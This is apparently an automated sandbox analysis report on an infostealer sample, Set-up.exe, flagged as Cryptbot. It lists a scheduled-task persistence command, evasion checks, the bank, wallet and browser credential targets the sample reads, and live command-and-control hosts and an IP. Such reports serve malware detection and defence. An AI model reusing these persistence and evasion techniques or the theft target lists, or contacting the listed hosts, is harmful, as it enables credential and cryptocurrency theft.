Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3BED10 push eax; mov dword ptr [esp], ebx 5_2_6C3BEE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C394E31 push eax; mov dword ptr [esp], ebx 5_2_6C394E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C388E7A push edx; mov dword ptr [esp], ebx 5_2_6C388E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38A947 push eax; mov dword ptr [esp], ebx 5_2_6C38A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3BEAB0 push eax; mov dword ptr [esp], ebx 5_2_6C3BEBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C392AAC push edx; mov dword ptr [esp], ebx 5_2_6C392AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3A8AA0 push eax; mov dword ptr [esp], ebx 5_2_6C3A909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C390AA2 push eax; mov dword ptr [esp], ebx 5_2_6C390AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3C2BF0 push eax; mov dword ptr [esp], ebx 5_2_6C3C2F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3C2BF0 push edx; mov dword ptr [esp], ebx 5_2_6C3C2F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C388435 push edx; mov dword ptr [esp], ebx 5_2_6C388449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3A8460 push eax; mov dword ptr [esp], ebx 5_2_6C3A8A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38048B push eax; mov dword ptr [esp], ebx 5_2_6C3804A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3804E0 push eax; mov dword ptr [esp], ebx 5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C361CFA push eax; mov dword ptr [esp], ebx 5_2_6C416622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C361CFA push eax; mov dword ptr [esp], ebx 5_2_6C416622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38A5A7 push eax; mov dword ptr [esp], ebx 5_2_6C38A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3C2620 push eax; mov dword ptr [esp], ebx 5_2_6C3C2954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3C2620 push edx; mov dword ptr [esp], ebx 5_2_6C3C2973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3D06B0 push eax; mov dword ptr [esp], ebx 5_2_6C3D0A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3986A1 push 890005EAh; ret 5_2_6C3986A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3806A2 push eax; mov dword ptr [esp], ebx 5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3806A6 push eax; mov dword ptr [esp], ebx 5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3806FD push eax; mov dword ptr [esp], ebx 5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3866F3 push edx; mov dword ptr [esp], ebx 5_2_6C386707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38070E push eax; mov dword ptr [esp], ebx 5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38A777 push eax; mov dword ptr [esp], ebx 5_2_6C38A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C390042 push eax; mov dword ptr [esp], ebx 5_2_6C390056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C35E0D0 push eax; mov dword ptr [esp], ebx 5_2_6C416AF6
Drops PE files
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\UwGCIJbIlmBudMOlckMv.dll Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\Set-up.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 813 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Set-up.exe TID: 5988 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1308 Thread sleep count: 813 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1308 Thread sleep time: -81300s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: Set-up.exe Binary or memory string: VMware
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2154640438.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.0000000001983000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Set-up.exe Binary or memory string: UT0VT.node-rednode_modules.quokkaMPC-HCMPC-BEPotPlayerMiniDaumVMwareCCleanerBrowser.exeD:G:I:F:H:C:DewMobileBorisFXInnovative SolutionsimloifkgjagghnncjkhggdhalmcnfklkbackupMultiBitHDwalletsleveldbrecoveryIntel(R)Microsoft_CorporationGoogle Web DesignerDevice MetadataWindows MailK-MeleonVSCommonvshubVS Revo Group@trezorLedger LiveMarc Gravell.tlauncherjvmsjava(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0Opera GXDefaultOpera CryptoOpera DeveloperOperaOpera UnknownOpera Beta/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0bit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATOR(cur_archive_file_ofs & (pZip->m_file_offset_alignment - 1)) == 0WebStorageVideoDecodeStatsoptimization_guide_prediction_model_downloads4kdownload.com\bluestacks-services\atomic\AMD
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Set-up.exe, 00000000.00000000.2043681328.00000000017D7000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .node-rednode_modules.quokkaMPC-HCMPC-BEPotPlayerMiniDaumVMwareCCleanerBrowser.exeD:G:I:F:H:C:DewMobileBorisFXInnovative SolutionsimloifkgjagghnncjkhggdhalmcnfklkbackupMultiBitHDwalletsleveldbrecoveryIntel(R)Microsoft_CorporationGoogle Web DesignerDevice MetadataWindows MailK-MeleonVSCommonvshubVS Revo Group@trezorLedger LiveMarc Gravell.tlauncherjvmsjava(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0Opera GXDefaultOpera CryptoOpera DeveloperOperaOpera UnknownOpera Beta/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0bit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATOR(cur_archive_file_ofs & (pZip->m_file_offset_alignment - 1)) == 0WebStorageVideoDecodeStatsoptimization_guide_prediction_model_downloads4kdownload.com\bluestacks-services\atomic\AMD
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2154640438.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.000000000193E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.0000000001983000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00018230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 5_2_00018230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_0001116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 5_2_0001116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00011160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 5_2_00011160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_000111A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 5_2_000111A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_000113C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 5_2_000113C9
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3C84D0 cpuid 5_2_6C3C84D0
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Set-up.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Set-up.exe, 00000000.00000002.2666887733.00000000019A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 123.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 5.2.service123.exe.6c340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2649593570.000000000451B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 5440, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Set-up.exe String found in binary or memory: \Electrum-btcp\wallets
Source: Set-up.exe String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000000.2043681328.00000000017D7000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: OlkOxygen - Atomic Crypto WalletYoroiPolkadot{.js} extensionSolflare WalletSui WalletBitwarden - Free Password ManagerLastPass - Free Password ManagerEnkrypt - Multichain Crypto WalletRabby WalletAuthyCrypto.com - Wallet ExtensionZilPayExodus Web3 WalletTrust WalletMartian Aptos & Sui Wallet ExtensionOKX WalletAuthenticatorBackpackXverse WalletUniSat WalletTonkeeper - wallet for TONSafePal Extension WalletKeplrTemple - Tezos WalletMEW CXJaxx LibertyGuarda WalletSollet WalletTrezor Password ManagerUnknown Wallet\Ledger Live\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)RAM: Data (Time): CPU: Installed Apps:
Source: Set-up.exe String found in binary or memory: Jaxx Liberty
Source: Set-up.exe String found in binary or memory: \Exodus\backup
Source: Set-up.exe String found in binary or memory: Exodus Web3 Wallet
Source: Set-up.exe String found in binary or memory: Ethereum (UTC)
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522675 Sample: Set-up.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 28 twelvevx12vs.top 2->28 36 Multi AV Scanner detection for domain / URL 2->36 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 7 other signatures 2->42 8 Set-up.exe 4 2->8         started        13 service123.exe 2->13         started        15 service123.exe 2->15         started        signatures3 process4 dnsIp5 30 twelvevx12vs.top 84.38.182.221, 49704, 49706, 49712 SELECTELRU Russian Federation 8->30 24 C:\Users\user\AppData\...\service123.exe, PE32 8->24 dropped 26 C:\Users\user\...\UwGCIJbIlmBudMOlckMv.dll, PE32 8->26 dropped 44 Found many strings related to Crypto-Wallets (likely being stolen) 8->44 46 Uses schtasks.exe or at.exe to add and modify task schedules 8->46 48 Tries to harvest and steal browser information (history, passwords, etc) 8->48 50 Drops large PE files 8->50 17 service123.exe 8->17         started        20 schtasks.exe 1 8->20         started        file6 signatures7 process8 signatures9 32 Found evasive API chain (may stop execution after checking mutex) 17->32 34 Found stalling execution ending in API Sleep call 17->34 22 conhost.exe 20->22         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
84.38.182.221
 twelvevx12vs.top Russian Federation
49505 SELECTELRU true

Contacted Domains

Name IP Active
twelvevx12vs.top 84.38.182.221 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
twelvevx12vs.top true unknown
+twelvevx12vs.top true
    		unknown
    analforeverlovyu.top true
    • URL Reputation: safe
    		 unknown
    s.top true unknown
    LRPCtwelvevx12vs.top true
      		unknown
      @twelvevx12vs.top true unknown
      upload.phps.top true
        		unknown